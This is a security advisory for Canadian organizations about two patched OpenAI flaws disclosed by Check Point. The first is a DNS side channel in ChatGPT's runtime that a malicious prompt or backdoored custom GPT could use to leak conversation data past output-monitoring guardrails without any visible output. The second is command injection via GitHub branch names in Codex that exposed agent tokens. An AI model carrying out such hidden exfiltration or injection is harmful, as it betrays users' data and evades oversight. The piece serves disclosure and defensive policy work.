What Happened
Check Point researchers disclosed two vulnerabilities in OpenAI products, both now patched, that exposed user data through separate attack paths.
The first flaw affected ChatGPT’s Linux runtime environment. Researchers identified a DNS-based side channel allowing an attacker to encode sensitive conversation data into DNS queries sent to an attacker-controlled server. A malicious prompt or a backdoored custom GPT configuration triggered the exfiltration without producing visible output in the chat interface, bypassing the output-monitoring guardrails ChatGPT applies to outbound data transfer attempts. The technique allowed user messages, uploaded files, and other conversation content to leave the platform undetected. OpenAI patched this issue on February 20, 2026, and found no evidence of malicious exploitation in the wild. The Register described the technique as “DNS data smuggling.”
The second flaw affected OpenAI’s Codex cloud platform. A command injection vulnerability in the GitHub integration allowed an attacker to inject arbitrary shell commands through a malicious GitHub branch name submitted as part of a task execution request. Exploitation retrieved the GitHub authentication tokens used by the Codex agent container during the task. OpenAI patched this flaw on February 5, 2026, following responsible disclosure in December 2025.
Why This Matters for Canadian Organizations
These disclosures arrive at a point when many Canadian enterprises, government departments, universities, and technology companies are in the middle of rolling out AI tools to their workforces. ChatGPT, with its enterprise and team tiers, is among the most commonly adopted AI platforms in Canadian workplaces.
The ChatGPT exfiltration flaw has specific implications for organizations where employees upload internal documents, financial data, legal filings, health-related records, or other sensitive materials to AI systems for analysis or summarization. The threat model here is not just an external attacker sending a malicious prompt to a random user. It also includes a compromised custom GPT deployed within an organization’s own ChatGPT Enterprise environment, or a custom GPT available on the public GPT store that an employee installs without IT awareness. The exfiltration channel is invisible to the user because it operates through DNS rather than the chat output.
Canadian organizations subject to PIPEDA, provincial health privacy legislation, or the federal Treasury Board’s Directive on Automated Decision-Making need to consider what data employees are authorized to process in external AI platforms, and whether the platform’s security controls are sufficient for the sensitivity of that data. The ChatGPT flaw was patched before public disclosure, but the existence of DNS-based exfiltration as a viable attack path in AI runtimes is a category of risk with implications beyond this specific product.
The Codex GitHub token vulnerability is relevant for Canadian software development teams using AI-assisted coding with GitHub integration. Compromised GitHub tokens provide access to private repositories, CI/CD pipelines, and deployment credentials. For organizations in regulated sectors, a token exposure from an AI coding agent represents a different class of supply chain risk than a direct repository breach.
What to Do
Both vulnerabilities are patched and do not require immediate action from end users. The operational response is at the policy and governance level. Review your organization’s AI acceptable use policy to specify what categories of data employees are permitted to upload or submit to external AI platforms. If employees work with personal data, health records, financial data, or government information in their roles, those data categories need explicit treatment in your AI policy. Evaluate whether your ChatGPT Enterprise or team configuration restricts the GPT store or custom GPT installations to approved tools only — a compromised third-party GPT represents the same threat vector as the research-disclosed flaw. For development teams using Codex or similar AI coding tools with GitHub integration, audit the permission scope of tokens granted to AI agents and apply least-privilege principles. Document AI tool usage for your privacy impact assessment process under PIPEDA if your organization processes personal data.
Source: The Hacker News | The Register
